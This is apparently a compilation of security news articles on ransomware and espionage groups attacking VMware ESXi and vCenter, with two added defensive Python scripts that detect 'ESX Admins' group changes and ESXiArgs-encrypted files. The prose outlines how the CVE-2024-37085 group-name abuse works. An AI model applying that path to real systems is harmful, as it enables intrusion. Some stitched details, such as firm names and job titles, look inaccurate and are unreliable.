Ransomware Groups Exploit VMware ESXi Bug for Widespread Attacks

Several ransomware groups have been exploiting a vulnerability in VMware ESXi hypervisors that allows them to bypass authentication and rapidly deploy malware across virtual environments. Identified as CVE-2024-37085, the bug has been assigned a “medium” severity score of 6.8 out of 10 on the CVSS scale. The score reflects the fact that attackers need existing permissions in a target’s Active Directory (AD) to exploit it. With AD access, however, they can inflict substantial damage: CVE-2024-37085 allows them to instantly elevate their ESXi privileges to the highest level, enabling the deployment of ransomware, data theft, lateral movement within the network, and more.

Notably, groups such as Storm-0506 (also known as Black Basta), Storm-1175, Manatee Tempest (part of Evil Corp), and Octo Tempest (also known as Scattered Spider) have utilized this vulnerability to distribute ransomware like Black Basta and Akira. Broadcom has released a fix for the vulnerability, which is available on its website. The vulnerability arises in scenarios where organizations configure their ESXi hypervisors to use AD for user management. By default, ESXi hypervisors grant full administrative access to any member of an AD domain group named “ESX Admins.” This oversight means that an attacker with sufficient AD privileges can create an “ESX Admins” group in the targeted domain and add a user to it, thereby gaining full administrative access to the ESXi hypervisors. Alternatively, they could rename an existing group to “ESX Admins” and use one of its existing users or add a new one. 

This vulnerability is problematic because ESXi hypervisors do not validate the existence of the “ESX Admins” group when joining a domain. The membership in this group is determined by name rather than by security identifier (SID), making the exploit straightforward. An attacker only needs to create or rename a group to “ESX Admins” to exploit the vulnerability. Ransomware attacks targeting ESXi hypervisors and virtual machines (VMs) have become increasingly common, particularly since 2020, as enterprises have accelerated their digital transformation efforts and adopted modern hybrid cloud and virtualized on-premise environments. 
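Because ESXi resolves the group by name, the attack path leaves a clear trail in Active Directory audit logs. The following detection logic is an added example (not from the article, Microsoft or Broadcom) that flags the group creation, rename and membership events that would satisfy the “ESX Admins” condition; the Windows Security event IDs are the standard group-management ones, and the sample events are constructed.

```python
"""Flag Active Directory changes that would satisfy the CVE-2024-37085 condition.

Before the fix, ESXi grants full admin rights to members of an AD group named
"ESX Admins", matched by name rather than SID. A defender therefore wants an alert
whenever a group with that name is created, an existing group is renamed to it, or
a member is added to it. The sample events below are constructed for this example.
"""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Windows Security event IDs for security-enabled group management
GROUP_CREATED = {4727, 4731, 4754}   # global / local / universal group created
MEMBER_ADDED = {4728, 4732, 4756}    # member added to global / local / universal group
ACCOUNT_RENAMED = 4781               # name of an account (including a group) was changed

TARGET_GROUP = "esx admins"


@dataclass
class Alert:
    event_id: int
    reason: str
    actor: str
    detail: str


def normalize_group(name: str) -> str:
    """ESXi matches the group by its bare name, so drop any DOMAIN\\ prefix and
    compare case-insensitively (matching loosely errs on the side of alerting)."""
    return name.rsplit("\\", 1)[-1].strip().lower()


def analyze_event(ev: dict) -> Optional[Alert]:
    """Return an Alert if this event creates, renames or populates an 'ESX Admins' group."""
    eid = ev.get("EventID")
    actor = ev.get("SubjectUserName", "<unknown>")
    if eid in GROUP_CREATED and normalize_group(ev.get("TargetUserName", "")) == TARGET_GROUP:
        return Alert(eid, "group-created", actor, ev["TargetUserName"])
    if eid == ACCOUNT_RENAMED and normalize_group(ev.get("NewTargetUserName", "")) == TARGET_GROUP:
        return Alert(eid, "group-renamed", actor,
                     f"{ev.get('OldTargetUserName', '?')} -> {ev['NewTargetUserName']}")
    if eid in MEMBER_ADDED and normalize_group(ev.get("TargetUserName", "")) == TARGET_GROUP:
        return Alert(eid, "member-added", actor, ev.get("MemberName", "<unknown member>"))
    return None


def analyze_events(events: Iterable[dict]) -> List[Alert]:
    """Run every event through analyze_event and keep only the hits."""
    return [alert for alert in (analyze_event(e) for e in events) if alert is not None]


# Constructed sample events, shaped like the data fields of the Windows Security XML payloads.
SAMPLE_EVENTS = [
    {"EventID": 4727, "SubjectUserName": "helpdesk01", "TargetUserName": "ESX Admins"},
    {"EventID": 4728, "SubjectUserName": "helpdesk01", "TargetUserName": "ESX Admins",
     "MemberName": "CN=svc-backup,CN=Users,DC=corp,DC=example"},
    {"EventID": 4781, "SubjectUserName": "jdoe",
     "OldTargetUserName": "Legacy Print Ops", "NewTargetUserName": "CORP\\esx admins"},
    {"EventID": 4727, "SubjectUserName": "jdoe", "TargetUserName": "Finance Users"},
    {"EventID": 4728, "SubjectUserName": "jdoe", "TargetUserName": "Finance Users",
     "MemberName": "CN=alice,CN=Users,DC=corp,DC=example"},
]

if __name__ == "__main__":
    for alert in analyze_events(SAMPLE_EVENTS):
        print(f"[{alert.reason}] event {alert.event_id} by {alert.actor}: {alert.detail}")
```

Running the block over the constructed events yields three alerts (create, add member, rename) and ignores the unrelated Finance Users changes.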

Virtualized environments offer hackers significant advantages, as hypervisors typically run many VMs simultaneously, making them ideal targets for widespread ransomware deployment. These VMs often host critical services and business data, making successful attacks highly disruptive. The limited visibility and protection for hypervisors from traditional security products exacerbate this issue. Hypervisors’ isolation and complexity, along with the specialized knowledge required to protect them, make it difficult for conventional security tools to monitor and safeguard the entire environment. 

Additionally, API integration limits further complicate protection efforts. To mitigate these risks, Microsoft emphasizes the importance of keeping systems up to date with patches and practicing broader cyber hygiene around critical and vulnerable assets. Ensuring that systems are patched and that cyber hygiene practices are in place can help defend against such attacks. As ransomware actors increasingly target these systems, organizations must remain vigilant and proactive in their cybersecurity measures.

Play Ransomware Group is Targeting VMware ESXi Environments

Play ransomware is the latest ransomware gang to launch a specific Linux locker for encrypting VMware ESXi virtual machines. Trend Micro, whose analysts discovered the new variant, says the locker is designed to verify that it is operating in an ESXi environment before executing and can evade detection on Linux systems.

"This is the first time that we've observed Play ransomware targeting ESXi environments," Trend Micro stated. "This development suggests that the group could be broadening its attacks across the Linux platform, leading to an expanded victim pool and more successful ransom negotiations."

This has been a well-known trend for years, with most ransomware organisations turning their focus to ESXi virtual machines after companies started using them for data storage and critical application hosting because of their far more effective resource management. Taking down an organization's ESXi VMs causes significant business disruptions and outages, while encrypting files and backups severely limits the victim's ability to restore compromised data.

While examining this Play ransomware sample, Trend Micro discovered that the ransomware gang leverages URL-shortening services provided by a threat actor known as Prolific Puma. 

After successfully launching, the Play ransomware Linux samples search for and power down all VMs discovered in the compromised environment before encrypting files (e.g., VM disk, configuration, and metadata files), appending the .PLAY extension to the end of each file. According to Trend Micro, the encryptor executes specific code to shut down all running VMware ESXi virtual machines so that they can be encrypted.

The Play ransomware emerged in June 2022, with the first victims seeking help in BleepingComputer forums. Its operators are infamous for stealing sensitive information from compromised devices, which they then use in double-extortion attempts to force victims into paying a ransom under the threat of releasing the stolen data online.

Rackspace, the City of Oakland in California, Arnold Clark, the Belgian city of Antwerp, and Dallas County are among the high-profile victims of the Play ransomware. In December, the FBI issued a joint advisory with CISA and the Australian Cyber Security Centre (ACSC) warning that the ransomware group had penetrated about 300 organisations worldwide as of October 2023.

Unmasking the Mallox Ransomware Variant: Targeting VMware ESXi Environments

Key highlights

  • The variant specifically checks whether the targeted system is running in a VMware ESXi environment and has administrative rights. If these requirements are not met, it won’t proceed with an attack.
  • The Linux variant uses a custom shell script for payload delivery and execution, a departure from Mallox’s previous methods.
  • The adversary behind this variant is a Mallox affiliate known as “vampire,” suggesting broader campaigns with high ransom demands and extensive IT system targeting.
  • The custom shell also exfiltrates victim information to two different servers, ensuring the ransomware actors have a backup of the data.

The Mallox ransomware group

The Mallox ransomware organization is targeting VMware ESXi setups with a new Linux strain that uses a novel mechanism to deliver and execute its payload only on systems where it has high-level user privileges.

The variant, discovered by Trend Micro researchers who track Mallox as TargetCompany, specifically checks whether a targeted system is running in a VMware ESXi environment and has administrative rights, and will not launch an attack if these conditions are not met.

Selective targeting and privileged environments

Mallox, also known as Fargo and Tohnichi, first appeared in June 2021 and claims to have infected hundreds of organizations worldwide. The group's targeted sectors include manufacturing, retail, wholesale, legal, and professional services. According to Trend Micro, the most active Mallox sites this year are in Taiwan, India, Thailand, and South Korea.

Custom Shell: Sophisticated attack

The Linux variation is the first time Mallox has been seen employing a customized shell script to deliver and execute ransomware on virtualized environments, indicating that the activity was likely intended to cause more disruption and, as a result, increase the chances of a ransom payment.

Also, the adversary responsible for wielding the variant is a Mallox affiliate known as "vampire," implying the group's involvement in "broader campaigns involving high ransom demands and expansive IT system targeting," Trend Micro's Darrel Tristan Virtusio, Nathaniel Morales, and Cj Arsley Mateo wrote in the post.

Implications

The usage of a customized shell also suggests that Mallox "has been continuously evolving to employ more sophisticated methods in its future attacks," the researchers wrote.

This freshly discovered Linux variant is consistent with the recent trend of ransomware gangs expanding their attacks to important Linux environments, potentially increasing the number of target victims.

In addition to delivery and execution, the custom shell script sends the victim's information to two additional servers, giving the ransomware perpetrators a backup. Mallox is reported to have used a leak site of the same name to publish data obtained during ransomware attacks.

How does the Mallox variant work?

This variant first checks whether the executable is running with administrative privileges; if not, it does not continue its operation.

Following execution, the variant creates a text file named TargetInfo.txt that contains victim information and sends it to a command-and-control (C2) server, similar to the Windows version of Mallox ransomware.

The IP address used to steal this information and later execute the payload was not previously used by Mallox. According to the researchers, it is hosted by China Mobile Communications, a Chinese ISP, and was most likely hired by the threat actor for a brief period to host its malicious payload.

Data extraction strategies

The program also checks whether the system name matches "vmkernel," indicating that the machine is running VMware's ESXi hypervisor. If so, it runs its encryption routine, appending the ".locked" extension to encrypted files and dropping a ransom note called HOW TO DECRYPT.txt. The researchers found that both the extension and the note differ from the Windows variant.

The custom shell script used to download and execute the payload can also exfiltrate data to another server. When the ransomware completes its routine, the script reads the contents of the dropped text file and uploads it to another URL.

The variant also exports victim information to two distinct sites, possibly "to improve redundancy and have a backup in case a server goes offline or is compromised," the researchers stated.

After the ransomware completes its routine, the script deletes the TargetCompany payload, making it even more difficult for security to determine the full impact of the attack, complicating investigation and incident response.

Linux ESXi environment: Careful of Cyberattacks

Mallox's clever expansion of its assault activities into Linux platforms running VMware ESXi necessitates more vigilance on the part of enterprises fitting this description, according to the researchers.

The researchers proposed that enterprises implement multifactor authentication (MFA) to prevent attackers from executing lateral movement within a network.

Undetected Threat: Chinese Hackers' Long-Term VMware Exploitation

CVE-2023-34048 (CVSS 9.8) is an out-of-bounds write flaw in VMware’s DCERPC implementation that an attacker with network access can exploit to execute arbitrary code remotely.

As a result of the severity of the problem and the lack of workaround, VMware released patches for this vulnerability in October, noting that the patch was also available for versions of its products that had reached the end-of-life period (EOL). 

There has been some reported exploitation of CVE-2023-34048 in the wild since last week, according to the virtualization technology company's advisory, but it does not provide any specific details on the attacks observed. 

Experts have revealed that the Chinese state-sponsored group UNC3886 has been exploiting zero-day vulnerabilities in VMware and Fortinet devices for years.

Earlier this week, Mandiant issued a report alleging that a group was exploiting the vulnerability to deploy malware, steal credentials, and ultimately exfiltrate sensitive information. The security patch was released in late October of 2023, and it carries a severity rating of 9.8/10 (critical). 

The flaw is described as an out-of-bounds write that allows attackers with access to the VirtualCenter Server to execute code remotely. The cyberspies took advantage of it to gain access to their targets' vCenter servers and used the compromised credentials to install maliciously crafted vSphere Installation Bundles (VIBs) carrying the VirtualPita and VirtualPie backdoors on ESXi hosts.

Next, the attackers exploited a VMware Tools authentication bypass flaw, CVE-2023-20867, to gain access to guest virtual machines, harvest files, and exfiltrate them. Although Mandiant was not yet certain how the attackers acquired privileged access to victims' VMware servers, a VMware service crash minutes before the backdoors were deployed pointed to the link, and it closely coincided with the exploitation of CVE-2023-34048 in late 2023.

Mandiant has revealed that the attacker weaponized CVE-2023-34048 as a zero-day to gain privileged access to the vCenter system and enumerate all VMware ESXi hosts connected to it, along with their virtual machines.

Next, the adversary retrieves the cleartext "vpxuser" credentials for the hosts and connects to them directly to install the VIRTUALPITA and VIRTUALPIE malware, which lets them interact with the hosts directly.

As Mandiant revealed in June 2023, this paves the way for exploiting another VMware flaw, (CVE-2023-20867, CVSS score: 3.9). As a consequence, arbitrary commands can be executed on guest VMs and files can be transferred between the guest virtual machines from a compromised ESXi host using this flaw. 

As Mandiant pointed out in its analysis, the same crashes were observed in several UNC3886 intrusions that began in late 2021, suggesting the attacker had access to the vulnerability for approximately one and a half years. The cybersecurity firm also observed that the 'vmdird' core dumps had been removed from the compromised environments to cover the attackers' tracks, although the log entries were preserved.

With the release of vCenter Server 8.0U2, VMware patched the vulnerability. Patches are also available for vCenter Server versions 8.0U1, 7.0U3, 6.7U3, 6.5U3, VCF 3.x, as well as Async vCenter Server versions 5.x and 4.x.

Abyss Locker Ransomware Targets VMware ESXi Servers on Linux

The infamous Abyss Locker ransomware has surfaced as a significant threat to Linux users, primarily targeting VMware ESXi servers. This is worrying news for cybersecurity experts and server managers. Security experts are concerned about this ransomware's potential damage to vital server infrastructure.

According to reports from reliable sources, the Linux version of Abyss Locker is specifically made to take advantage of vulnerabilities in VMware ESXi servers, which are frequently used in data centers and enterprise settings.

Targeted servers are thought to be accessed by ransomware using well-known security flaws, frequently made possible by incorrect setups or unpatched software. Upon entering the system, Abyss Locker employs encryption algorithms to secure important files and databases, making them unavailable to authorized users of the server.

Cybersecurity news source BleepingComputer stated that "Abyss Locker demands a substantial Bitcoin ransom, and the threat actors behind the attacks have set a strict deadline for payment. If the instructions are not followed within the allotted time, the encrypted data may be permanently lost or the ransom price may rise."

The appearance of the Linux variant indicates a change in the strategies used by ransomware developers. Historically, ransomware attacks have primarily targeted Windows-based computers. This new discovery, however, suggests that there is increasing interest in breaking into Linux-based servers, which are frequently used to host important websites, databases, and apps.

Experts and researchers in security are hard at work examining the behavior of ransomware to identify any vulnerabilities that might help in the creation of decryption software or defense mechanisms. They encourage businesses to lower their vulnerability to these kinds of attacks by keeping their software up to date, installing security patches as soon as possible, and adhering to recommended server hardening procedures.

The main emphasis should be on prevention rather than reaction, as is the case with many ransomware strains. An organization's capacity to repel ransomware attacks can be greatly increased by putting strong security measures in place, backing up data often, and implementing intrusion detection systems.

The scenario is obviously worrying, but it also emphasizes how constantly changing cyber threats are. It is a clear reminder that businesses need to be proactive and watchful in protecting their systems from the newest threats and weaknesses.

To keep ahead of attackers, the cybersecurity community keeps in touch and exchanges information. Affected firms should implement security best practices and notify law enforcement authorities, such as local law enforcement or national cybersecurity authorities, of any ransomware attacks.

ESXi Servers are Targeted by Linux-Based Akira Ransomware

As part of a ransomware operation called Akira, VMware ESXi virtual machines have been encrypted using a Linux encryption tool to block access to them. The move comes after the group targeted Windows systems for a couple of months.

The Akira ransomware operation uses a Linux encryptor to encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide.

There has been a recent expansion of the Akira ransomware and it now targets VMware ESXi virtual machines using a Linux encryptor. It is because of this adaptation that Akira can now attack companies across the globe. 

This ransomware virus, Akira, was found in March 2023. As the most recent addition to the ransomware landscape, it is relatively less well-known. 

In the short time that Akira ransomware has been in operation, 45 organizations have been confirmed as affected. Most of the targets are based in the U.S. and range from childcare centers to large financial institutions.

The threat actors conduct double extortion attacks against their victims: they steal data from breached networks, encrypt files, and then demand payouts of several million dollars.

In addition to asset managers, the gang's blog lists several other victims. Once an attack has been launched, Akira encrypts the organization's files and renames them with its own extension. A ransom note displayed on the desktop explains, in a condescending tone, that paying the ransom is the quickest way back to the state in which the company functions normally.

The Development Bank of Southern Africa and London Capital Group are among the victims named, and the gang's dark web blog lists many US-based companies.

Akira uses double extortion techniques to pressure its victims into paying a ransom: it copies the data before encrypting it, so that it can threaten to release the information in addition to selling the decryption key, and uses both levers to force a company into paying.

In some cases, the ransoms amount to more than a million dollars, while in others it is less. It has focused on professional services, education, manufacturing, and research and development so far.

In sectors as diverse as education and finance, the threat of ransomware has disrupted corporate networks and encrypted stolen data from breached networks. These compromised files are marked with the extension .akira, which signifies compromise. 

It is important to note that, after the Akira ransomware has been activated, many different file extensions and names will become encrypted, as well as renamed files with the .akira extension. There will also be a ransom note titled akira_readme.txt left in each folder on the encrypted device. 

The Linux build of Akira is configurable, including the percentage of each file that will be encrypted, which allows threat actors to better tailor their attacks. The propensity of this version to skip folders and files usually associated with Windows suggests that it was ported from the Windows version.

Akira's expanding scope, with organizations around the world now exposed, illustrates the urgency of action. Sadly, ransomware groups are increasingly extending their operations to Linux platforms, many of them leveraging readily available tools to do so, and have turned this into a simple and lucrative strategy for maximizing profits.

Among the most notable ransomware operations, some of which predominantly target VMware ESXi servers with their ransomware encryptors, include Royal, Black Basta, LockBit, BlackMatter, AvosLocker, HelloKitty, RansomEXX, and Hive. These operations use Linux-based encryption methods. 

Spreads Rapidly, is Widely Popular, and is Unsecured 

ESXi servers are popular targets in ransomware attacks because a single run of the encryptor on a host reaches every VM it runs, which makes the attack extremely fast. ESXi has gained wide adoption in the enterprise world and is among the most widely used hypervisors on the planet. Lastly, the hosts typically have no security solution installed on them; CrowdStrike previously published a report noting that antivirus software simply isn't supported by the manufacturer.

During the weekend of February 2-6, thousands of ESXi servers were targeted in attacks taking place simultaneously. The attackers exploited a two-year-old vulnerability. Good cyber security for servers is therefore very important, because research can take a long time and is not always easy. The problem had been discovered by Mandiant in 2022, but it had not yet been exploited at scale and was still little known.

Here's Why Cybercriminals are Targeting Linux Operating Systems

Internal strife is common among ransomware gangs. They argue, they fight, and they establish allies only to rapidly break them. Take, for instance, the leak of malware code from Babuk, which was compromised in 2021 by hackers enraged at being duped by the infamous ransomware gang. 

The outcomes of this intramural warfare are frequently fruitful for cybersecurity experts. Ten other ransomware gangs used the code to attack VMware ESXi servers after that, and a number of versions were produced that researchers have been busy tracking ever since.

However, what made this particular family of malware noteworthy was that it specifically targeted Linux, which has quickly become a favourite of developers working on creating virtual machines for cloud-based computer systems, hosting for live websites, or IoT devices. With an estimated 14 million internet-facing gadgets, 46.5% of the top million websites by traffic, and an astounding 71.8% of IoT devices using Linux on any one day, its use has increased significantly in recent years. 

That's excellent news for advocates of open-source software development, for whom Linux has always served as an illustration of what can be accomplished when coding communities work together without being constrained by anything as odious as a corporate culture or a profit motivation. 

It's also really alarming for some cybersecurity specialists. Not only is there a significant dearth of ongoing research into the security of Linux-based systems in comparison to those based on more mainstream operating systems, but there is also no official, overarching method for patching the vulnerabilities in this OS. Instead, as befits an open-source product, 'flavours' of Linux are patched on an ad hoc basis by developers with time and intellect to spare - a valuable resource in the face of a real tsunami of cybercrime. Attackers are taking note. AtlasVPN discovered over 1.9 million new malware threats last year, representing a 50% rise year on year.

Shifting trend 

It wasn't always like this. Bharat Mistry recalls a time when hackers were more interested in cracking open old Windows computers. "I believe cybercriminals stayed away because they believed the popularity wasn't there," says Trend Micro's technical director for the UK and Ireland. Linux had a reputation for being secure by design, with reduced default access levels and other characteristics designed to hinder the easy spread of malware. "But over the last six years, certainly with cloud usage, it's [usage has] exponentially grown," says Mistry, increasing the amount of possible vulnerabilities. 

According to Mistry, this is largely due to the fact that it offers a cheap and cheerful alternative to the dominant OS brands, with many different flavours of unlicensed Linux accessible. "When you look at things like web servers that are hosted in the cloud, [why] should I pay for a Windows licence?" Mistry asks, speaking from the perspective of a savvy, money-conscious company. A Linux alternative is "as cheap as chips and does exactly what I need it to do. I can install Apache on it... and have the performance I want without the extra cost."

Unfortunately, if an operating system is designed and maintained according to open source principles, hackers looking to exploit it can simply source it on GitHub and other software forums. Ensar Seker, for one, is concerned about the consequences for the use of virtual machines (VMs) in the cloud. "Virtual machines often lack the same level of security monitoring as physical systems, making it easier for attackers to go undetected for a longer period of time," says the chief information security officer at digital risk protection platform SOCRadar. 

The fact that the vast majority of software on IoT devices is based on Linux should also be cause for concern, according to the researcher, especially considering the rate of development expected for the smart device market over the next decade. More concerningly, Mistry continues, "we're seeing Linux being used more and more in critical systems," owing to how easy it is to branch and customise variants of the OS to suit particular jobs compared to its mainstream counterparts.

Given hackers' access to the source code of the operating system, malware designed to break open-source versions of these systems is frequently created to a higher standard than its Windows-targeting counterparts. It's also popular among a wide range of cybercriminal gangs. Tilted Temple, a Chinese cyber group, has utilised Linux-based malware to infiltrate important national infrastructure on three continents. 

Major players in the cybercriminal underworld, such as Black Basta, Lockbit, and Hive, have all been identified as deploying targeted Linux-chomping malware to breach online infrastructure. Another such gang, RTM, has been found on dark web forums as trading in harmful, Linux-targeting software. 

It's unclear how prepared cybersecurity providers are for this new threat. After all, until recently, these companies spent far more time fixing vulnerabilities in more widespread operating systems. Far fewer have investigated how vulnerable Linux systems can be to hacking - a squandered opportunity, according to Mistry. "Everyone's been so focused on Windows over the last few years because it's been the predominant operating system that all enterprises use," he explains. "But, in the background, Linux has always been there." 

Future threats 

Mistry does not believe the current wave of Linux attacks will abate anytime soon. He feels it will be some time before consumers and developers become aware of the risks and alter their behaviours. "The vulnerabilities in Linux platforms are massive," Mistry adds. "No one is actively controlling the vulnerabilities and patching them on a daily basis." 

Does this imply that its open-source framework contributes directly to Linux's lack of security? Certainly less, says Mistry. "You've got the openness, you've got the mass flexibility - the problem is when it comes to support," explains Mistry. 

Organisations developing new software on Linux should educate themselves on the trade-offs involved in adopting the operating system. The communities of developers modifying and patching this or that variant of Linux have "got people who will do things, but there's no kind of set body to say, 'This is the kind of direction we're going [in.]," adds Mistry, let alone any built-in regime mandating security standards. As a result, firms would be advised, according to the TrendMicro researcher, to install their own regime or create a viable audit trail for products built on some of the more unusual varieties of Linux. 

So, are the days of Linux as a popular OS alternative numbered? Probably not in the short term, and many cybersecurity vendors are becoming aware of the threat posed by Linux-based systems, according to Mistry. Nonetheless, according to Seker, each new security event involving Linux-targeting malware only serves to erode its reputation as an economical, secure, and open-source alternative to the monolithic Windows and iOS. "Even a single high-profile incident can quickly change a perception if the security community does not respond to threats promptly and effectively," he says.

Ransomware Targeting VMware ESXi Servers Rises

The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have released a joint advisory warning about an ongoing ESXiArgs ransomware campaign targeting unpatched and out-of-service or out-of-date versions of the VMware ESXi hypervisor for virtual machines (VMs).

The OpenSLP service contains a heap overflow bug that unauthenticated threat actors can exploit in simple attacks; it is tracked as CVE-2021-21974. As per CISA, 3,800 VMware ESXi servers around the world have reportedly been compromised, potentially rendering any running VMs useless.

Application of the patch as soon as feasible is strongly advised by CERT-FR, but it also says that systems that are not patched should be checked for indicators of compromise.

The ESXiArgs ransomware appears to have begun attacking servers in Europe around February 3, although it has since moved to North America. According to the French computer emergency response team (CERT-FR), organizations should isolate impacted servers, reinstall ESXi 7.x or ESXi 8.x in a supported version, and apply any patches.

Updated ESXiArgs Ransomware

On infected ESXi hosts, the ransomware encrypts files with the .vmxf, .vmx, .vmdk, .vmsd, and .nvram extensions and writes a .args file containing metadata next to each encrypted file.

Research shows that ESXiArgs is based largely on stolen Babuk source code, which has previously been used by other ESXi ransomware, including Cheerscrypt and the PrideLocker encryptor from the Quantum/Dagon group. It is unclear whether this is a new variant or simply a shared Babuk codebase: the ransom notes for ESXiArgs and Cheerscrypt are quite similar, but the encryption technique is distinct.

CISA and the FBI urged owners of VMware ESXi servers to upgrade them to the most recent version, harden ESXi hypervisors by disabling the SLP service, and make sure the ESXi hypervisor is not reachable from the open internet.
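As a defensive follow-up to the encryption behaviour described above, here is an added triage script (not code from the original post, CISA or CERT-FR). It walks an ESXi datastore directory, pairs each .args marker with the VM file it accompanies, and reports affected VMs per folder so a responder can see what needs isolation and restore work. The datastore layout and file names it builds for the demo are constructed, and the walk uses only the extensions listed above.

```python
"""Triage helper for ESXiArgs-style encryption on an ESXi datastore.

Added example, not code from the original post or from CISA/CERT-FR.
It walks a datastore directory, pairs each ESXiArgs ".args" metadata file
with the VM file it was written for, and groups the findings per VM folder.
The directory layout and file names used in the demo are constructed.
"""
import os
import tempfile
from collections import defaultdict

# Extensions ESXiArgs is reported to encrypt (from the advisory text).
TARGET_EXTENSIONS = {".vmxf", ".vmx", ".vmdk", ".vmsd", ".nvram"}
# Marker the ransomware writes next to each encrypted file.
ARGS_SUFFIX = ".args"


def find_encrypted_vm_files(datastore_root):
    """Return {vm_folder: [encrypted_file, ...]} for files flagged by a .args marker.

    A file counts as encrypted only if both the original-name file and its
    ".args" twin exist; a lone .args file is reported under the key "orphan".
    """
    findings = defaultdict(list)
    for dirpath, _, filenames in os.walk(datastore_root):
        names = set(filenames)
        for name in filenames:
            if not name.endswith(ARGS_SUFFIX):
                continue
            original = name[: -len(ARGS_SUFFIX)]
            _, ext = os.path.splitext(original)
            if ext.lower() not in TARGET_EXTENSIONS:
                continue
            rel_folder = os.path.relpath(dirpath, datastore_root)
            if original in names:
                findings[rel_folder].append(original)
            else:
                findings["orphan"].append(os.path.join(rel_folder, name))
    return {k: sorted(v) for k, v in findings.items()}


def build_demo_datastore():
    """Create a constructed datastore layout: one hit VM, one clean VM, one stray marker."""
    root = tempfile.mkdtemp(prefix="datastore1-")
    layout = {
        "web01": ["web01.vmx", "web01.vmx.args", "web01.vmdk", "web01.vmdk.args",
                  "web01.nvram", "web01.nvram.args", "web01-flat.vmdk"],
        "db01": ["db01.vmx", "db01.vmdk", "db01.nvram"],
        "lost": ["old.vmsd.args"],
    }
    for folder, files in layout.items():
        os.makedirs(os.path.join(root, folder))
        for f in files:
            with open(os.path.join(root, folder, f), "wb") as fh:
                fh.write(b"constructed sample content")
    return root


if __name__ == "__main__":
    demo = build_demo_datastore()
    for vm, files in find_encrypted_vm_files(demo).items():
        print(f"{vm}: {', '.join(files)}")
```

Point find_encrypted_vm_files at a mounted or copied datastore path; the "orphan" bucket catches .args markers whose original file is missing, which is worth a look before restoring from backup.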

Specifically Targeted VMware RCE Vulnerabilities
Publicly available exploit code now covers three security vulnerabilities in VMware's vRealize Log Insight platform, among them critical unauthenticated remote code execution (RCE) bugs, giving cybercriminals a ready path to weaponize them in a variety of ways. 

VMware says vRealize Log Insight is going forward under the name Aria Operations; the platform provides intelligent log management for infrastructure and applications "in any environment," VMware states. It gives IT departments visibility across physical, virtual, and cloud environments, and its dashboards and analytics can be extended through third-party extensions. 

The platform is typically deployed as an appliance and has access to sensitive areas of an organization's IT infrastructure across a wide range of devices. 

According to Horizon.ai researcher James Horseman, who examined the publicly available exploit code, an attacker who gains access to the Log Insight host could abuse some interesting features, depending on which applications are integrated with it. Ingested logs often include sensitive information from other services, such as session tokens, API keys, and personally identifiable information, all of which could be gathered during an attack. With keys and sessions harvested from one system, an attacker could pivot to another and compromise it in turn. 

As a result, according to Dustin Childs, chief executive officer of Trend Micro's Zero Day Initiative (ZDI), the organization responsible for disclosing the vulnerabilities, organizations need to be aware of the associated risks, particularly since the bugs are easy to reach and present a low barrier to exploitation. 

A centralized log management tool of this type is typically used across the whole enterprise, so a compromise of it poses a substantial risk for the enterprise; accordingly, VMware recommends testing and deploying the patch as quickly as possible after receiving it. 

VMware vRealize Log Insight Bugs: An In-Depth Look 

According to the original VMware advisory, both critical issues carry severity scores of 9.8 out of 10; each could let an unauthenticated, malicious actor inject files into the operating system of an impacted appliance, which can result in remote code execution. 

The first (CVE-2022-3172) is a directory traversal vulnerability and is the most serious of the set; the second (CVE-2022-31704) is a broken access control vulnerability. 

The third flaw (CVE-2022-31710, CVSS 7.5) is a less severe denial-of-service vulnerability that could allow an unauthenticated malicious actor to remotely trigger a denial of service. 

Creating a Bug Chain to Facilitate a Full Takeover of a System

Researchers at Horizon.ai revealed that the three issues can be chained together after identifying exploit code in the wild, which led VMware to update its advisory today. 

Horseman wrote that the combined vulnerability chain is very easy to exploit, although it requires the attacker to set up some infrastructure to serve malicious payloads. Because the chain yields remote code execution as root, an attacker who exploits it can take full control of the system. 

He did point out that the product is intended for use on an internal network; Shodan data showed 45 appliances publicly exposed on the internet. Even so, the chain can be used both internally and externally. 

"It's very likely that the attacker already has a foothold somewhere else on the network by the time they target this product since this product is not likely to be exposed to the Internet," he noted. To determine if there has been any damage caused by an attacker, additional investigation is necessary.

The virtualization giant disclosed the three vulnerabilities last week as part of a larger batch that also contained a fourth weakness: a medium-severity vulnerability that could enable data harvesting without authentication (CVE-2022-31711, CVSS 5.3). Currently there is no public exploit code for the latter, but that could change shortly, especially since cybercriminals are increasingly interested in VMware's offerings. 

The remaining issue could likely be exploited in a variety of ways in the future as well. ZDI's Childs says the team has proof-of-concept code demonstrating that the vulnerabilities exist, and the researchers would not be surprised if others came up with an exploit quickly. 

What are the Best Practices for Protecting an Enterprise? 

Admins should apply VMware's patches as soon as possible to keep their organizations protected, or apply the workaround VMware recommends. Horizon.ai has also published indicators of compromise (IoCs) that organizations can use to hunt for attacks. 

If you use vRealize or Aria Operations for centralized log management, make sure that log data is protected, Childs advises. Patching should be the first step, but there are other things to consider: whether the platform is connected to the Internet, and whether IP restrictions limit who can access it. The case is also a reminder that every tool or product within an organization is a potential foothold for an attacker.   

Concerns About Supply Chain Risks Need Strategies
It is common for the security industry to be unsettled when new vulnerabilities are discovered in software; two new vulnerabilities reported in OpenSSL in late October and early November 2022 overwhelmed news feeds. This never-ending vulnerability cycle begins with the discovery and disclosure of vulnerabilities, and its impact is felt most acutely by those who work on the front lines of information technology, for whom the pressure to remediate is harsh. 

Security leaders must maintain an effective cybersecurity strategy that filters some of the noise from newly disclosed vulnerabilities, considers their impact on supply chains, and takes the necessary steps to secure their assets. 

Supply Chain Attacks Aren't Going Away 

There have been several severe vulnerabilities in Log4j, Spring Framework, and OpenSSL components in the last year, which have caused significant amounts of data to be lost. As long as implementations are misconfigured or rely on known vulnerable dependencies, it is also certain that those older vulnerabilities will be exploited in the future. In November 2022 it emerged that Iranian state-sponsored actors had mounted an attack campaign against a Federal Civilian Executive Branch (FCEB) entity. The United States federal entity ran VMware Horizon infrastructure that contained the Log4Shell vulnerability, which served as the initial attack vector and allowed the attackers into the network. In the course of that single attack on the FCEB entity, the chain included lateral movement, credential compromise, system compromise, network persistence, endpoint protection bypass, and crypto-jacking. 

After security incidents involving vulnerable packages like OpenSSL or Log4j, organizations are likely to wonder why they are consuming open-source software at all. According to a recent report, supply chain attacks continue to be on the rise because suppliers and partners are reusing components. 

